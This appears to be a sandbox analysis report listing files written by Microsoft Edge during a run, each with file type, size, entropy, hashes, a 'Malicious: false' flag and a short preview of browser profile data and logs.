Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c0efc64d-39db-48d7-a075-9c061ae22358.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e89d6a38-24e0-415f-b1c4-c886dce089dc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.571802471726618
Encrypted:	false
SSDEEP:	768:vLhm7VWPPjf038F1+UoAYDCx9Tuqh0VfUC9xbog/OV/F8ctrwepstuE:vLhm7VWPPjf03u1jaUScWltT
MD5:	1DCA8DA51F300D943139D4CA44748C9D
SHA1:	20C74D7694BCDFB517CDAC9D30DEA02B37FAF235
SHA-256:	3D26AA050A778F4610E3E2740AC20BAEDA4DCAAA0DDD6F97FC78126E0901EA30
SHA-512:	99D71C73CA5D733DF23B9195D3775E07C4E400203F1B89BA0C15700B7F427037C05BE31F925B86618FA5D8A556B1AED81D8BD3ED39EF2BBFE8A237BD0F4B16AE
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380904566154328","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380904566154328","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f1588493-09d0-4eb4-88fc-c7b4811cbc00.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17628), with no line terminators
Category:	dropped
Size (bytes):	17632
Entropy (8bit):	5.486879830100537
Encrypted:	false
SSDEEP:	192:st6J99QTryDigabatSuyplsfb7IlN6x6v66kdjeDPYKwFwwTTVAEr3O8obV+FTZ7:st6PGKSu4lsfb7i46ijfTFQbG9QwKj90
MD5:	BB856F25097ACED08C258654E0E28FB7
SHA1:	ACA3F33CC88BE24446EED9B89FEA13F042592F6B
SHA-256:	2BCCD928DD5E71A248F2B10C6137EA212DD4BCDF8AEBC3D4E2EC047B645672A2
SHA-512:	08A62D5F441AEDF1181E11F268BB1ED951798616B1D5F46044105EE1E2AD4126E8D9E7BA7986350369DB7930F1DC4AA0D337A40FADCDB2F6577C1CB0AF8F6CE7
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904566875568","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10259139715805989
Encrypted:	false
SSDEEP:	12:+2Q12xspEjVl/PnnnnnnnnnnnvoQ/Eou:+t3oPnnnnnnnnnnnv1j
MD5:	20CFEF4CD2A4AA4E5E706E608F7D568C
SHA1:	95DDFD79294FB72AE1E2EA5F1A0BF120C34F3115
SHA-256:	3B82D10653A0DBA93E358B273B99C84DE6A9ED2AFC79717A8BE8494787FD039D
SHA-512:	5588875EFE73DBB3AB503D191529FE6BEF0FE16FF906E12AC54E073F7EF012651CFF4F4AEFE9B1A4853E32BBB3C20DE1FFD7000863543D5DC9CD1CFE824A065A
Malicious:	false
Preview:	..-.............M..........x...f..^..6WH..<......-.............M..........x...f..^..6WH..<............I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8891526139062179
Encrypted:	false
SSDEEP:	384:7EatkdKp8TMmjZEB9DHBsurO1xMv8zy4yW1yfycTROyQxy4P:Pfmn
MD5:	152F4DB2C98D064BF4EA7F467AD46E27
SHA1:	3DA0FEF6DEE0B61B0DD940DC9659F596180C613A
SHA-256:	34E5BC8F7200AB29421B6610F608E3D82851B23BF14B0B9747E4D1DADEC04630
SHA-512:	39D27D2613EE0EDFDF89690DDF39A97C63A6D4243BB2376BC4721AFD06942EFA408570D247B9E372FF67D383DA4ED0EB0F54ADD0D71DB702B8085BB10716CA4F
Malicious:	false
Preview:	7....-............^..6W3...B!N...........^..6W..&#_.V.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	580
Entropy (8bit):	3.7711571055304955
Encrypted:	false
SSDEEP:	6:/XntM+1l3sedhOnQyOuuuuuuuuuuuuuuuHilly3sedhO2U:dlc8CdOuuuuuuuuuuuuuuuCllF8lU
MD5:	DBD321859E1CB9A27C1EB8A5C45E6F17
SHA1:	48670FD859395482DD245869D2F764D668A7C4D4
SHA-256:	31CEDFF95C47B4DD79392596DD1AAD74212F40A75FE46E506D260124A4FB4093
SHA-512:	3865B9F5F73649961C0EC959FBFF08EAC3F93D7384E387D9C6C434AF1D571D1C2FD11B687ACCC13E3B557747DCEFBCC4D993C8EF64276D2C51BD05AD4181E07E
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1x...0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=..................w;...............#38_h.......6.Z..W.F......f.......f...........V.e................V.e................D.\|00................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.239234827248141
Encrypted:	false
SSDEEP:	6:iOrvkcpMq2PFi23oH+TcwtfrK+IFUtJvkcP9ZmwPvkcFMkwOFi23oH+TcwtfrUed:7RpMvdZYeb23FUtzl/1+5wZYeb3J
MD5:	34CE4E3EA6F977FAEAAB64B70B79DF7E
SHA1:	54DB24F617523C7859ACEA87CA11AAA61524F393
SHA-256:	6F4B505874FEBC25AA3A3D339C1D104BCBFD2C162392FEF76A4A513FAF7C45DC
SHA-512:	F6532C24D69DC2AA0658F8AF4A1A749B965C2D1F7CEF006BD52317BA9D64AB3C6B3065190E41F73D28F90C84F6BF1556820567BDD72AB3E572EB6673BEDDA959
Malicious:	false
Preview:	2025/01/09-08:56:06.940 19d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:56:06.946 19d0 Recovering log #3.2025/01/09-08:56:06.947 19d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.239234827248141
Encrypted:	false
SSDEEP:	6:iOrvkcpMq2PFi23oH+TcwtfrK+IFUtJvkcP9ZmwPvkcFMkwOFi23oH+TcwtfrUed:7RpMvdZYeb23FUtzl/1+5wZYeb3J
MD5:	34CE4E3EA6F977FAEAAB64B70B79DF7E
SHA1:	54DB24F617523C7859ACEA87CA11AAA61524F393
SHA-256:	6F4B505874FEBC25AA3A3D339C1D104BCBFD2C162392FEF76A4A513FAF7C45DC
SHA-512:	F6532C24D69DC2AA0658F8AF4A1A749B965C2D1F7CEF006BD52317BA9D64AB3C6B3065190E41F73D28F90C84F6BF1556820567BDD72AB3E572EB6673BEDDA959
Malicious:	false
Preview:	2025/01/09-08:56:06.940 19d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:56:06.946 19d0 Recovering log #3.2025/01/09-08:56:06.947 19d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	753
Entropy (8bit):	4.037333775091125
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
MD5:	C5675C35B320A0898802E1ECFD3476E8
SHA1:	B6CA1C2EE1340662A7B495778416988006748327
SHA-256:	8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
SHA-512:	DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.222957600343214
Encrypted:	false
SSDEEP:	6:iOrvkcUFFKq2PFi23oH+TcwtfrzAdIFUtJvkcFZmwPvkcXkwOFi23oH+TcwtfrzS:7RUFMvdZYeb9FUtzF/1X5wZYeb2J
MD5:	2DF9235E59A1FFE6B5A49BA0BB51036B
SHA1:	993C812F729F68BA99B780DAE8E1B55018280B1C
SHA-256:	CA76703EA217BA5A68E1F9E0437F4BC6C635F4F3B03D645538191B7C5BFF92DF
SHA-512:	8756F85BA0C6648B9E6C66AB17FDFF907069A596A441A156A75E0A5C7A4E6950C6D2E84B8FAE8FB0DEF6A99891B8E10CCB12AFF30D5ED7F4DAFD3799E5F285DB
Malicious:	false
Preview:	2025/01/09-08:56:06.936 19d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:56:06.937 19d0 Recovering log #3.2025/01/09-08:56:06.937 19d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.222957600343214
Encrypted:	false
SSDEEP:	6:iOrvkcUFFKq2PFi23oH+TcwtfrzAdIFUtJvkcFZmwPvkcXkwOFi23oH+TcwtfrzS:7RUFMvdZYeb9FUtzF/1X5wZYeb2J
MD5:	2DF9235E59A1FFE6B5A49BA0BB51036B
SHA1:	993C812F729F68BA99B780DAE8E1B55018280B1C
SHA-256:	CA76703EA217BA5A68E1F9E0437F4BC6C635F4F3B03D645538191B7C5BFF92DF
SHA-512:	8756F85BA0C6648B9E6C66AB17FDFF907069A596A441A156A75E0A5C7A4E6950C6D2E84B8FAE8FB0DEF6A99891B8E10CCB12AFF30D5ED7F4DAFD3799E5F285DB
Malicious:	false
Preview:	2025/01/09-08:56:06.936 19d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:56:06.937 19d0 Recovering log #3.2025/01/09-08:56:06.937 19d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF339be.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33a89.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33c10.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	43978
Entropy (8bit):	6.091563492277619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kXzUXqgfbcztXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynCAt3FqfyW0e6kaoZ
MD5:	B8C44FD62DBA6EA065DDFDB0244439D4
SHA1:	CAE2B3DD4FF540682E3F239E03E869DC88DFB2D6
SHA-256:	27C196BEADAB4E33A47195ECBA5A74D38BD6697759136391A65F22B9293B2C70
SHA-512:	27F6CF5D77C2BDA8953C47A2DD24AE644274F50399E35123704335A1CD6147B181EB89A289F426931F6EED7E08FA0D7532E49B18AEA4599B22CB46A83E8B538D
Malicious:	false
